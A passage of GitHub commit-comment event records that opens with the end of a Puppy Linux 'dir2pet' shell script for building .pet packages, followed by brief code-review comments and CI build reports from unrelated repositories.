\" for more information how to create these scripts properly)\"\r\n\techo\r\n\techo \"If any of the above needs to be further sorted out, you can quit this\"\r\n\techo \"script right now by pressing CTRL-C, otherwise just press ENTER\"\r\n\tcase $comp in\r\n\t\txz)default=xz char=\"g\" other=gzip;;\r\n\t\tgz)default=gzip char=\"x\" other=xz;;\r\n\tesac\r\n\techo \"to use the default \\\"$default\\\" compression or \\\"$char\\\" then ENTER for \"\r\n\techo \"\\\"$other\\\" compression.\"\r\n\techo -n \"Press ENTER key or \\\"$char\\\" and ENTER to continue: \"\r\n\tread goforit\r\n\tcase $goforit in\r\n\tx)EXT=\"xz\" \r\n\techo\r\n\techo \"xz compression chosen.\" \r\n\tsleep 1;;\r\n\tg)EXT=\"gz\"\r\n\techo\r\n\techo \"gzip compression chosen.\" \r\n\tsleep 1;;\r\n\t*)EXT=\"${default:0:2}\" ;;\r\n\tesac #131122, 131123, 140715\r\nelse\r\n\tEXT=$comp\r\nfi\r\n# end comp\r\n. /etc/xdg/menus/hierarchy #has PUPHIERARCHY variable.\r\n\r\nDESKTOPFILE=\"\"\r\nADESKTOPFILE=\"`find $ADIR -type f -name \\*.desktop`\"\r\n[ \"$ADESKTOPFILE\" != \"\" ] && DESKTOPFILE=\"yes\"\r\n\r\nif [ \"$skip\" != 1 ];then\r\n\techo\r\n\techo -en \"\\\\033[1;31mStep 1\" #red\r\n\techo -e \"\\\\033[0;39m\"\r\n\tif [ \"$DESKTOPFILE\" = \"\" ];then\r\n\t echo \"Currently there is no .desktop file (they are usually at usr/share/applications\"\r\n\t echo \"or usr/local/share/applications), so perhaps this package is not supposed to\"\r\n\t echo \"have a menu entry? You can optionally create one though...\"\r\n\t echo \"If you know that the ${BASEPKG} application does not require\"\r\n\t echo \"a menu entry, press the ENTER key only.\"\r\n\t echo \"If a menu entry is required, type any printable character then ENTER.\"\r\n\t echo \"(if in doubt, just press ENTER key)\"\r\n\t echo -n \"Type a printable character or just ENTER key: \"\r\n\t read YESMENU\r\n\t [ \"$YESMENU\" = \"\" ] && DESKTOPFILE=\"ignore\"\r\n\telse #w476\r\n\t echo \"A .desktop file was found here:\"\r\n\t echo \"$ADESKTOPFILE\"\r\n\t echo \"So this application will have a menu entry.\"\r\n\t echo \"If you want to change the .desktop file in any way, open it in a text editor\"\r\n\t echo \"right now, before proceeding and make any changes you want.\"\r\n\t echo \"In particular, check that the icon exists, and that 'Category' entry fits\"\r\n\t echo \"into Puppy's menu hierarchy (see file /etc/xdg/menus/hierarchy).\"\r\n\t echo \"After satisfying yourself that the .desktop file is ok, press the ENTER key\"\r\n\t echo \"to continue this script.\"\r\n\t echo \"Or, type 'ignore' to build pet pkg as if there is no .desktop file.\"\r\n\t echo \"Or, type 'new' if you would like this script to ask a series of\"\r\n\t echo -n \"questions and rebuild the .desktop file from scratch: \"\r\n\t read NEWMENU\r\n\t [ \"$NEWMENU\" = \"ignore\" ] && DESKTOPFILE=\"ignore\" #w478\r\n\t if [ \"$NEWMENU\" = \"new\" ];then\r\n\t  for ONEDESKTOP in $ADESKTOPFILE\r\n\t  do\r\n\t   BASEDESK=\"`basename $ONEDESKTOP .desktop`\"\r\n\t   DIRDESK=\"`dirname $ONEDESKTOP`\"\r\n\t   echo \"Moving ${DIRDESK}/${BASEDESK}.desktop to /tmp\"\r\n\t   mv -f ${DIRDESK}/${BASEDESK}.desktop /tmp/\r\n\t  done\r\n\t  DESKTOPFILE=\"\"\r\n\t fi\r\n\tfi\r\n\t\r\n\tPUPAPPLICATION=\"\"\r\n\tPUPEXECUTABLE=\"\"\r\n\tPUPICON16=\"\"\r\n\tPUPAPPLICATION=\"\"\r\n\tif [ \"$DESKTOPFILE\" = \"yes\" ];then #w476\r\n\t #get some info out of it...\r\n\t FIRSTDESKTOPFILE=\"`echo -n \"$ADESKTOPFILE\" | head -n 1`\"\r\n\t PUPCATEGORY=\"`cat $FIRSTDESKTOPFILE | grep '^Categories=' | cut -f 2 -d '='`\"\r\n\t PUPEXECUTABLE=\"`cat $FIRSTDESKTOPFILE | grep '^Exec=' | cut -f 2 -d '='`\"\r\n\t PUPICON16=\"`cat $FIRSTDESKTOPFILE | grep '^Icon=' | cut -f 2 -d '='`\"\r\n\t PUPMENUDESCR=\"`cat $FIRSTDESKTOPFILE | grep '^Comment=' | cut -f 2 -d '='`\"\r\n\t [ \"$PUPMENUDESCR\" = \"\" ] && PUPMENUDESCR=\"`cat $FIRSTDESKTOPFILE | grep '^Name=' | cut -f 2 -d '='`\"\r\n\t [ \"$PUPMENUDESCR\" = \"\" ] && PUPMENUDESCR=\"`cat $FIRSTDESKTOPFILE | grep '^GenericName=' | cut -f 2 -d '='`\"\r\n\tfi\r\n\t\r\n\tif [ \"$DESKTOPFILE\" = \"\" ];then\r\n\t echo\r\n\t echo -en \"\\\\033[1;31mStep 1B\" #red\r\n\t echo -e \"\\\\033[0;39m\"\r\n\t echo \"Please type the category in which you want the application\"\r\n\t echo \"to create a window manager menu entry. The official Puppy\"\r\n\t echo \"has a menu hierarchy as follows:\"\r\n\t echo \"('X-' categories are unofficial, Puppy-specific)\"\r\n\t echo \"$PUPHIERARCHY\"\r\n\t echo\r\n\t echo -n \"Type one word from the CATEGORIES column: \"\r\n\t read PUPCATEGORY\r\n\t\r\n\t echo \r\n\t echo -en \"\\\\033[1;31mStep 1C\" #red\r\n\t echo -e \"\\\\033[0;39m\"\r\n\t echo \"Please enter the name of the executable. If it is in the\"\r\n\t echo \"executable-search-path, namely /bin, /sbin, /usr/bin,\"\r\n\t echo \"/usr/sbin, /root/my-applications/bin or /usr/local/bin,\"\r\n\t echo \"then you only need to enter the name of the executable\"\r\n\t echo \"not the path. Example: mtpaint\"\r\n\t echo \"(of course, if you need to specify the path here, it is\"\r\n\t echo \" the path AFTER the package is installed)\"\r\n\t echo\r\n\t echo -n \"Enter [path]executable: \"\r\n\t read PUPEXECUTABLE\r\n\t\r\n\t echo \r\n\t echo -en \"\\\\033[1;31mStep 1D\" #red\r\n\t echo -e \"\\\\033[0;39m\"\r\n\t echo \"Please enter the name of the icon that is to be used in\"\r\n\t echo \"the window manager menu entry.\"\r\n\t echo \"It is preferred that you specify the full path.\"\r\n\t echo\r\n\t echo -n \"Please type [path]icon: \"\r\n\t read PUPICON16\r\n\t\r\n\t echo \r\n\t echo -en \"\\\\033[1;31mStep 1E\" #red\r\n\t echo -e \"\\\\033[0;39m\"\r\n\t echo \"Please enter the name of the application, as you wish it to\"\r\n\t echo \"appear in the menu. It will be the first word in the menu entry.\"\r\n\t echo \"Example: Abiword\"\r\n\t echo\r\n\t echo -n \"Type application name: \"\r\n\t read PUPAPPLICATION\r\n\tfi\r\n\t\r\n\tif [ \"$PUPMENUDESCR\" = \"\" ];then #w476\r\n\t echo\r\n\t echo -en \"\\\\033[1;31mDescription\" #red\r\n\t echo -e \"\\\\033[0;39m\"\r\n\t echo \"Please enter a description of 1-3 words.\"\r\n\t if [ \"$DESKTOPFILE\" = \"\" ];then\r\n\t  echo \"This must be extremely short. as it will appear in the window\"\r\n\t  echo \"manager menu entry immediately after the application name.\"\r\n\t fi\r\n\t echo \"This may be used for various purposes, such by PETget for package\"\r\n\t echo \"management purposes.\"\r\n\t echo \"Example for Abiword: powerful wordprocessor\"\r\n\t echo\r\n\t echo -n \"Type the VERY SHORT description (without quotes): \"\r\n\t read PUPMENUDESCR\r\n\t echo\r\n\tfi\r\n\r\n\t#if pkg is a split-off, already has a known dependency...\r\n\tDEPBASE=\"\";DEPNOTE=\"\"\r\n\t[ ! \"`echo -n \"$NAMEONLY\" | grep '_DEV'`\" = \"\" ] &&  DEPBASE=\"+`echo -n \"$NAMEONLY\" | sed -e 's/_DEV//g'`\"\r\n\t[ ! \"`echo -n \"$NAMEONLY\" | grep '_DOC'`\" = \"\" ] &&  DEPBASE=\"+`echo -n \"$NAMEONLY\" | sed -e 's/_DOC//g'`\"\r\n\t[ ! \"`echo -n \"$NAMEONLY\" | grep '_NLS'`\" = \"\" ] &&  DEPBASE=\"+`echo -n \"$NAMEONLY\" | sed -e 's/_NLS//g'`\"\r\n\tif [ ! \"$DEPBASE\" = \"\" ];then\r\n\t DEPNOTE=\"NOTE5: It is strongly suggested that you at least enter ${DEPBASE}\r\n\t       the main package \r\n\t\"\r\n\tfi\r\n\t\r\n\tif [ \"$PUPOFFICIALDEPS\" = \"\" ];then\r\n\t echo\r\n\t echo -en \"\\\\033[1;31mDependencies\" #red\r\n\t echo -e \"\\\\033[0;39m\"\r\n\t echo \"Please enter a dependency-list for the PET package that is now being\"\r\n\t echo \"created. Packages already built-in to Puppy do not need to be\"\r\n\t echo \"explicitly named as dependencies (except a cut-down barebones version\"\r\n\t echo \"of Puppy may not have all of these built in, so you may have to\"\r\n\t echo \"think of the worst-case situation).\"\r\n\t echo \"How to enter this dependency-list is shown by an example: the package\"\r\n\t echo \"'pupdvdtool-0.5b' has the following dependency list:\"\r\n\t echo \"+vamps,+vobcopy,+ffmpeg,+dvdauthor,+gtkdialog3\"\r\n\t echo \"Each package name is preceded by a '+' and delimited by a ','.\"\r\n\t echo \"NOTE1: that 'gtkdialog3' requires the GTK libraries, but it is not\"\r\n\t echo \"       necessary to specify sub-dependencies, as if 'gtkdialog3'\"\r\n\t echo \"       needs to be installed it has its own dependency list.\"\r\n\t echo \"NOTE2: You can lookup the dependency-list of each package in the\"\r\n\t echo \"       /root/.packages/Packages-* database files\"\r\n\t echo \"NOTE3: it is not required to specify package version numbers,\"\r\n\t echo \"       VERSION NUMBERS NOT YET SUPPORTED BY PACKAGE MANAGER\"\r\n\t echo \"NOTE4: If you don't know what to specify, just press ENTER key\"\r\n\t echo \"       (the package manager will still do some basic dependency checking)\"\r\n\t echo \"$DEPNOTE\"\r\n\t echo -n \"Type dependency-list: \"\r\n\t read PUPOFFICIALDEPS\r\n\tfi\r\n\t\r\n\techo\r\n\techo -en \"\\\\033[1;31mGUI window\" #red\r\n\techo -e \"\\\\033[0;39m\"\r\n\t\r\n\t#create tarball...\r\n\trm -f $DIRPKG/${BASEPKG}.tar 2>/dev/null\r\n\trm -f $DIRPKG/${BASEPKG}.tar.${EXT} 2>/dev/null\r\n\trm -f $DIRPKG/${BASEPKG}.pet 2>/dev/null\r\n\tif [ \"$DESKTOPFILE\" = \"\" ];then\r\n\t mkdir -p $DIRPKG/$BASEPKG/usr/share/applications\r\n\t echo '[Desktop Entry]' > $DIRPKG/$BASEPKG/usr/share/applications/${NAMEONLY}.desktop\r\n\t echo 'Encoding=UTF-8' >> $DIRPKG/$BASEPKG/usr/share/applications/${NAMEONLY}.desktop\r\n\t echo \"Name=${PUPAPPLICATION} ${PUPMENUDESCR}\" >> $DIRPKG/$BASEPKG/usr/share/applications/${NAMEONLY}.desktop\r\n\t echo \"Icon=${PUPICON16}\" >> $DIRPKG/$BASEPKG/usr/share/applications/${NAMEONLY}.desktop\r\n\t echo \"Comment=${PUPAPPLICATION} ${PUPMENUDESCR}\" >> $DIRPKG/$BASEPKG/usr/share/applications/${NAMEONLY}.desktop\r\n\t echo \"Exec=${PUPEXECUTABLE}\" >> $DIRPKG/$BASEPKG/usr/share/applications/${NAMEONLY}.desktop\r\n\t echo \"Terminal=false\" >> $DIRPKG/$BASEPKG/usr/share/applications/${NAMEONLY}.desktop\r\n\t echo \"Type=Application\" >> $DIRPKG/$BASEPKG/usr/share/applications/${NAMEONLY}.desktop\r\n\t echo \"Categories=${PUPCATEGORY}\" >> $DIRPKG/$BASEPKG/usr/share/applications/${NAMEONLY}.desktop\r\n\t echo \"GenericName=${PUPAPPLICATION} ${PUPMENUDESCR}\" >> $DIRPKG/$BASEPKG/usr/share/applications/${NAMEONLY}.desktop\r\n\t echo\r\n\t echo \"File $DIRPKG/$BASEPKG/usr/share/applications/${NAMEONLY}.desktop created.\"\r\n\t echo\r\n\tfi\r\n\t\r\n\t#100201 determine if pkg is ditro-independent (scripts only)...\r\n\tARCHINDEPENDENT='yes'\r\n\tfor ONEEXEC in `find $DIRPKG/$BASEPKG -maxdepth 6 -type f -perm -o+x`\r\n\tdo\r\n\t [ -f $ONEEXEC ] && [ \"`file $ONEEXEC | grep ' ELF '`\" != \"\" ] && ARCHINDEPENDENT='no'\r\n\tdone\r\n\t[ \"`find $DIRPKG/$BASEPKG -maxdepth 6 -type f -name '*.a' -o -type f -name 'lib*.so*' -o -type f -name '*.la'`\" != \"\" ] && ARCHINDEPENDENT='no' #100303\r\n\t#[ \"`echo \"${BASEPKG}\" | grep '_DEV'`\" != \"\" ] && ARCHINDEPENDENT='no' #100303\r\n\t[ \"$ARCHINDEPENDENT\" = \"yes\" ] && ARCHDEPENDENT='no'\r\n\t\r\n\techo \"Press ENTER key to bring up a GUI window that will help you to create\"\r\n\techo \"a database entry for the package. This will be shown in a text editor\"\r\n\techo \"for saving somewhere, also written to file 'pet.specs' inside the pkg.\" \r\n\techo -n \"Press ENTER: \"\r\n\tread enternow\r\nfi\r\n\r\nSIZEK=\"`du -s -k $DIRPKG/$BASEPKG | cut -f 1`\" #w476\r\n\r\nif [ \"$skip\" != 1 ];then\r\n\t[ \"${PUPCATEGORY}\" = \"\" ] && PUPCATEGORY=\"EMPTY\"\r\n\t#if PUPCATEGORY is in format 'entry1;entry2;' extract only 'entry2'...\r\n\txPUPCATEGORY=\"`echo -n \"$PUPCATEGORY\" | tr ';' ' ' | tr -s ' ' | sed -e 's% $%%' | rev | cut -f 1 -d ' ' | rev`\"\r\n\tTOPCAT=\"`echo \"$PUPHIERARCHY\" | grep -e \"[ ,]$xPUPCATEGORY[ ,]\" -e \"[ ,]$xPUPCATEGORY\\$\" | cut -f 1 -d ' ' | head -n 1`\" #160524\r\n\t[ \"${TOPCAT}\" = \"\" ] && TOPCAT=\"EMPTY\"\r\n\t[ \"${PUPOFFICIALDEPS}\" = \"\" ] && PUPOFFICIALDEPS=\"EMPTY\"\r\n\t[ -z \"${PUPMENUDESCR}\" ] && PUPMENUDESCR=\"EMPTY\"\r\n\t[ \"${PUPPATH}\" = \"\" ] && PUPPATH=\"EMPTY\" #100201\r\n\t[ \"${DEFREPO}\" = \"\" ] && DEFREPO=\"EMPTY\" #100201\r\n\techo \"a${NAMEONLY}\" \"b${TOPCAT}\" \"c${PUPOFFICIALDEPS}\" \"d${PUPMENUDESCR}\" \"e$BASEPKG\" \"f$SIZEK\" \"g$PUPPATH\" \"h$ARCHDEPENDENT\" \"i$DEFREPO\"\r\n\tpetspec \"${NAMEONLY}\" \"${TOPCAT}\" \"${PUPOFFICIALDEPS}\" \"${PUPMENUDESCR}\" \"$BASEPKG\" \"$SIZEK\" \"$PUPPATH\" \"$ARCHDEPENDENT\" \"$DEFREPO\" #100201\r\n\tif [ $? -ne 0 ];then\r\n\t echo \"Aborted creation of PET package.\"\r\n\t exit\r\n\tfi\r\n\r\nelse\r\n\t. /etc/DISTRO_SPECS\r\n\tPUPOFFICIALDEPS=\"$deps\"\r\n\tTOPCAT=\"$category\"\r\n\t[ -z \"$TOPCAT\" ] && TOPCAT=BuildingBlock\r\n\tPUPMENUDESCR=\"$desc\"\r\n\t[ -z \"${PUPMENUDESCR}\" ] && PUPMENUDESCR=\"No description provided\"\r\n\txPATTERN=\"s%${NAMEONLY}%%\"\r\n\tVERSION=\"`echo -n \"$BASEPKG\" | sed -e \"$xPATTERN\" -e 's%^\\\\-%%'`\"\r\n\tARCHINDEPENDENT='yes'\r\n\tfor ONEEXEC in `find $DIRPKG/$BASEPKG -maxdepth 6 -type f -perm -o+x`\r\n\tdo\r\n\t [ -f $ONEEXEC ] && [ \"`file $ONEEXEC | grep ' ELF '`\" != \"\" ] && ARCHINDEPENDENT='no'\r\n\tdone\r\n\t[ \"`find $DIRPKG/$BASEPKG -maxdepth 6 -type f -name '*.a' -o -type f -name 'lib*.so*' -o -type f -name '*.la'`\" != \"\" ] && ARCHINDEPENDENT='no'\r\n\t[ \"$ARCHINDEPENDENT\" = \"no\" ] && COMPAT=$DISTRO_BINARY_COMPAT V=$DISTRO_COMPAT_VERSION\r\n\techo \"$BASEPKG|${NAMEONLY}|$VERSION||$TOPCAT|$SIZEK||${BASEPKG}.pet|$deps|$PUPMENUDESCR|$COMPAT|$V||\" > /tmp/petspec_db_entry\r\nfi\r\n\r\n\r\n[ -d $DIRPKG/$BASEPKG/tmp ] && chmod 1777 $DIRPKG/$BASEPKG/tmp #130305 rerwin.\r\n\r\ncat /tmp/petspec_db_entry | tail -n 1 > $DIRPKG/$BASEPKG/pet.specs\r\n\r\necho\r\necho \"Creating package...\"\r\ntar -c -f $DIRPKG/${BASEPKG}.tar $DIRPKG/$BASEPKG/\r\nsync\r\ncase $EXT in\r\nxz)xz -z -9 -e $DIRPKG/${BASEPKG}.tar ;;\r\ngz)gzip --best $DIRPKG/${BASEPKG}.tar ;;\r\nesac\r\nTARBALL=\"$DIRPKG/${BASEPKG}.tar.${EXT}\"\r\n\r\necho\r\necho \"File $DIRPKG/${BASEPKG}.tar.${EXT} created. Now converting to .pet...\"\r\nFULLSIZE=\"`stat --format=%s ${TARBALL}`\"\r\nMD5SUM=\"`md5sum $TARBALL | cut -f 1 -d ' '`\"\r\necho -n \"$MD5SUM\" >> $TARBALL\r\nsync\r\nmv -f $TARBALL $DIRPKG/${BASEPKG}.pet\r\nsync\r\n\r\necho\r\necho \"${BASEPKG}.pet has been created. Finished.\"\r\necho\r\necho \"If you look in ${BASEPKG} you will see the new '.specs' file.\"\r\nif [ \"$DESKTOPFILE\" = \"\" ];then\r\n echo \"And in $BASEPKG/usr/share/applications/ the new '.desktop' file.\"\r\nfi\r\necho \"Directory $BASEPKG is now configured correctly as a PET package\"\r\necho \"and in future you do not need to go through this script again.\"\r\necho \"You could manually edit the files if required, and create another\"\r\necho \".pet package just by doing this:\"\r\necho \"# tar -c -f ${BASEPKG}.tar ${BASEPKG}/\"\r\ncase $EXT in\r\nxz)echo \"# xz -z -9 -e ${BASEPKG}.tar\" ;;\r\ngz)echo \"# gzip --best ${BASEPKG}.tar\" ;;\r\nesac\r\necho \"# tgz2pet ${BASEPKG}.tar.${EXT}\"\r\necho\r\necho \"dir2pet exited.\"\r\n\r\n###END###\r\n```\r\n\r\nI've done a bit of testing in interactive and skip modes and all seems working as expected. I think there is no need of a special case for arm devices these days as there are some very fast ones around.\r\n\r\nCheers"}},"created_at":"2016-09-09T22:08:18Z"}
{"id":"4542688863","type":"CommitCommentEvent","actor":{"login":"eherot"},"repo":{"name":"evertrue/pam-cookbook"},"payload":{"comment":{"id":18970488,"position":null,"line":null,"path":null,"commit_id":"ee48cfacc567be51111c59c43b987ef0019898e9","created_at":"2016-09-09T22:09:19Z","updated_at":"2016-09-09T22:09:19Z","body":"This should handle some of the problems described in #3"}},"created_at":"2016-09-09T22:09:19Z"}
{"id":"4542691829","type":"CommitCommentEvent","actor":{"login":"kevinushey"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":18970496,"position":null,"line":null,"path":null,"commit_id":"ee4ee2aa143a43689c00f2a37f1637801963a8a5","created_at":"2016-09-09T22:10:01Z","updated_at":"2016-09-09T22:10:01Z","body":"Nice! I think this will also fix a similar issue that some users have seen when the Packages pane is disabled :)"}},"created_at":"2016-09-09T22:10:01Z"}
{"id":"4542697906","type":"CommitCommentEvent","actor":{"login":"gcanti"},"repo":{"name":"gcanti/flow-static-land"},"payload":{"comment":{"id":18970510,"position":87,"line":107,"path":"README.md","commit_id":"16a84aad3825cfe34868e87665677a29d18f8a1e","created_at":"2016-09-09T22:11:29Z","updated_at":"2016-09-09T22:11:29Z","body":"I put up a test project and indeed that [include] configuration in .flowconfig is useless. Flow seems to read the sources files of flow-static-land just fine, I'll update the docs, thanks for pointing out.\r\n\r\nFor what concerns webpack, AFAIK adding `path.resolve(__dirname, \"node_modules/flow-static-land\")` doesn't include the entire library: only the imported files will be traspiled and included."}},"created_at":"2016-09-09T22:11:29Z"}
{"id":"4542698900","type":"CommitCommentEvent","actor":{"login":"peonso"},"repo":{"name":"Seliro/theforgottenserver-7.4"},"payload":{"comment":{"id":18970514,"position":null,"line":null,"path":null,"commit_id":"1871d44c18c9a7c276b7abe25999775bf2338e43","created_at":"2016-09-09T22:11:43Z","updated_at":"2016-09-09T22:11:43Z","body":"You the boss, why don't you told me?"}},"created_at":"2016-09-09T22:11:43Z"}
{"id":"4542702717","type":"CommitCommentEvent","actor":{"login":"peonso"},"repo":{"name":"Seliro/theforgottenserver-7.4"},"payload":{"comment":{"id":18970531,"position":null,"line":null,"path":null,"commit_id":"1871d44c18c9a7c276b7abe25999775bf2338e43","created_at":"2016-09-09T22:12:41Z","updated_at":"2016-09-09T22:12:41Z","body":"make the pull requests\r\n"}},"created_at":"2016-09-09T22:12:41Z"}
{"id":"4542705881","type":"CommitCommentEvent","actor":{"login":"yyuu"},"repo":{"name":"yyuu/pyenv"},"payload":{"comment":{"id":18970556,"position":null,"line":null,"path":null,"commit_id":"a0c5fe42e9c47ab555a703abe0f5c3230cdb6081","created_at":"2016-09-09T22:13:31Z","updated_at":"2016-09-09T22:13:31Z","body":"It seems I forgot to push tags. Just pushed now."}},"created_at":"2016-09-09T22:13:31Z"}
{"id":"4542711974","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Stuff"},"payload":{"comment":{"id":18970596,"position":null,"line":null,"path":null,"commit_id":"e312c8d2c8f32e4e09c8a8ac58017b6ede95171e","created_at":"2016-09-09T22:15:10Z","updated_at":"2016-09-09T22:15:10Z","body":"@JoinRajuncraftNow WHY DID YOU FOLLOW MCELROY'S GITHUB?!"}},"created_at":"2016-09-09T22:15:10Z"}
{"id":"4542714127","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18970609,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-09T22:15:43Z","updated_at":"2016-09-09T22:15:43Z","body":"@JoinRajuncraftNow Why do you have a blank commit?"}},"created_at":"2016-09-09T22:15:43Z"}
{"id":"4542717192","type":"CommitCommentEvent","actor":{"login":"mwalkerwells"},"repo":{"name":"gcanti/flow-static-land"},"payload":{"comment":{"id":18970628,"position":87,"line":107,"path":"README.md","commit_id":"16a84aad3825cfe34868e87665677a29d18f8a1e","created_at":"2016-09-09T22:16:33Z","updated_at":"2016-09-09T22:16:33Z","body":"Regarding webpack, I'm pretty sure it just recursively follows the module dependency graph, but I'm not 100% sure.\r\n\r\nI was digging into this because of this Flow error (still haven't figured it out): Flow 0.32.0\r\n![screen shot 2016-09-09 at 3 15 09 pm](https://cloud.githubusercontent.com/assets/16157429/18404582/423c52c6-76a0-11e6-9bc6-8f1ad1cc58c5.png)\r\n"}},"created_at":"2016-09-09T22:16:33Z"}
{"id":"4542717286","type":"CommitCommentEvent","actor":{"login":"rednewguy"},"repo":{"name":"openbmc/docs"},"payload":{"comment":{"id":18970629,"position":80,"line":101,"path":"code-update.md","commit_id":"cfd9d114184e1f441298d49735e3384094aa3b0c","created_at":"2016-09-09T22:16:35Z","updated_at":"2016-09-09T22:16:35Z","body":"PrepareForUpdate does not take any arguments. POST fails if we pass TFTP server and filename as data. "}},"created_at":"2016-09-09T22:16:35Z"}
{"id":"4542720625","type":"CommitCommentEvent","actor":{"login":"robertsimoes"},"repo":{"name":"robertsimoes/Flow"},"payload":{"comment":{"id":18970655,"position":null,"line":null,"path":null,"commit_id":"e8f88af888d1d177ff78aa941c8dcf3ab34678ec","created_at":"2016-09-09T22:17:26Z","updated_at":"2016-09-09T22:17:26Z","body":"Hit enter by accident before changing commit details. \r\n\r\nThis was just minor refactoring "}},"created_at":"2016-09-09T22:17:26Z"}
{"id":"4542726610","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18970706,"position":null,"line":null,"path":null,"commit_id":"0ba4b021cbaa80cf824d8804beee6572ce4320fe","created_at":"2016-09-09T22:18:51Z","updated_at":"2016-09-09T22:18:51Z","body":"The following doc(s) have been deployed to the [terminusma](https://terminusma-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/terminus/commands](https://terminusma-static-docs.pantheonsite.io/docs/terminus/commands)\n- [source/_partials/footer_scripts.html](https://github.com/pantheon-systems/documentation/commit/0ba4b021cbaa80cf824d8804beee6572ce4320fe/source/_partials/footer_scripts.html)\n- [source/docs/assets/js/main.js](https://github.com/pantheon-systems/documentation/commit/0ba4b021cbaa80cf824d8804beee6572ce4320fe/source/docs/assets/js/main.js)\n- [source/docs/assets/terminuscommands.json](https://github.com/pantheon-systems/documentation/commit/0ba4b021cbaa80cf824d8804beee6572ce4320fe/source/docs/assets/terminuscommands.json)\n"}},"created_at":"2016-09-09T22:18:51Z"}
{"id":"4542727095","type":"CommitCommentEvent","actor":{"login":"CHKIM0676"},"repo":{"name":"CHKIM0676/hellogit"},"payload":{"comment":{"id":18970712,"position":4,"line":15,"path":"HellpGit/src/HellpGit.cpp","commit_id":"6ebc3d3cf92717b2d8f37686ab29f0c38333df38","created_at":"2016-09-09T22:18:59Z","updated_at":"2016-09-09T22:18:59Z","body":"Unnecessary Line"}},"created_at":"2016-09-09T22:18:59Z"}
{"id":"4542732046","type":"CommitCommentEvent","actor":{"login":"behlendorf"},"repo":{"name":"dinatale2/zfs-buildbot"},"payload":{"comment":{"id":18970762,"position":7,"line":310,"path":"master/master.cfg","commit_id":"72e6b8b0f6fbb6688ef9c2272333367474b24637","created_at":"2016-09-09T22:20:13Z","updated_at":"2016-09-09T22:20:13Z","body":"Extra space before \"master\""}},"created_at":"2016-09-09T22:20:13Z"}
{"id":"4542746685","type":"CommitCommentEvent","actor":{"login":"clay7on"},"repo":{"name":"clay7on/HelloWorld"},"payload":{"comment":{"id":18970858,"position":null,"line":null,"path":null,"commit_id":"340e0801553a1154512c8344b154bed6fc47fe3d","created_at":"2016-09-09T22:23:48Z","updated_at":"2016-09-09T22:23:48Z","body":"<img src=https://assets-cdn.github.com/images/icons/emoji/octocat.png>"}},"created_at":"2016-09-09T22:23:48Z"}
{"id":"4542754418","type":"CommitCommentEvent","actor":{"login":"spike11302000"},"repo":{"name":"Codepixl/GLCraft"},"payload":{"comment":{"id":18970872,"position":null,"line":null,"path":null,"commit_id":"6309a91758384db1f483b85058892b0843d28933","created_at":"2016-09-09T22:25:46Z","updated_at":"2016-09-09T22:25:46Z","body":"i just found the mod loader i made"}},"created_at":"2016-09-09T22:25:46Z"}
{"id":"4542757658","type":"CommitCommentEvent","actor":{"login":"aliciatb"},"repo":{"name":"socrata/odn-backend"},"payload":{"comment":{"id":18970879,"position":null,"line":null,"path":null,"commit_id":"4df6673090c520052c62c3dadd49189eeffcda63","created_at":"2016-09-09T22:26:37Z","updated_at":"2016-09-09T22:26:37Z","body":"Fixes #553, https://github.com/socrata/opendatanetwork.com/issues/553 and #555, https://github.com/socrata/opendatanetwork.com/issues/555"}},"created_at":"2016-09-09T22:26:37Z"}
{"id":"4542761451","type":"CommitCommentEvent","actor":{"login":"comedinha"},"repo":{"name":"mattyx14/otxserver"},"payload":{"comment":{"id":18970889,"position":12,"line":40,"path":"path_10_9/config.lua","commit_id":"2f3bb5a71325aeee6eb443c8e612f2a8d437d337","created_at":"2016-09-09T22:27:35Z","updated_at":"2016-09-09T22:27:35Z","body":"No need change on movements to get depot boxes?"}},"created_at":"2016-09-09T22:27:35Z"}
{"id":"4542768138","type":"CommitCommentEvent","actor":{"login":"tcz001"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18970905,"position":29,"line":67,"path":"otrv4.md","commit_id":"a3843e02bd4c2830189b53547c402ec8362db533","created_at":"2016-09-09T22:29:21Z","updated_at":"2016-09-09T22:29:21Z","body":"Since we already have an overview and we want to minimize the definition of OTR, without a bunch of words, I don't think it's a good idea to have all these in High level overview. But again, this need to be simplified and probably can be moved in terminology."}},"created_at":"2016-09-09T22:29:21Z"}
{"id":"4542771527","type":"CommitCommentEvent","actor":{"login":"andy5995"},"repo":{"name":"andy5995/triviabot"},"payload":{"comment":{"id":18970911,"position":null,"line":null,"path":null,"commit_id":"1d501e2aa87c0ef78ad0ac3745eb5b5809424e48","created_at":"2016-09-09T22:30:17Z","updated_at":"2016-09-09T22:30:17Z","body":"On L240, there are 3 quotes on each side. Why is that?"}},"created_at":"2016-09-09T22:30:17Z"}
{"id":"4542774140","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18970921,"position":null,"line":null,"path":null,"commit_id":"ce38a20beac15dd001d28d4f00609beda91e7d4c","created_at":"2016-09-09T22:30:52Z","updated_at":"2016-09-09T22:30:52Z","body":"develop (Unknown) - x86_64-MacOS-10.10-clang: OK (2382 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ce38a20beac15dd001d28d4f00609beda91e7d4c-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ce38a20beac15dd001d28d4f00609beda91e7d4c-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.3%25-yellow.svg)</a> \n"}},"created_at":"2016-09-09T22:30:52Z"}
